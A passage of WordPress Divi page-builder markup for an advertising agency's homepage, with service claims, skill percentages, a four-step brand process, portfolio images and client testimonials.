number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with 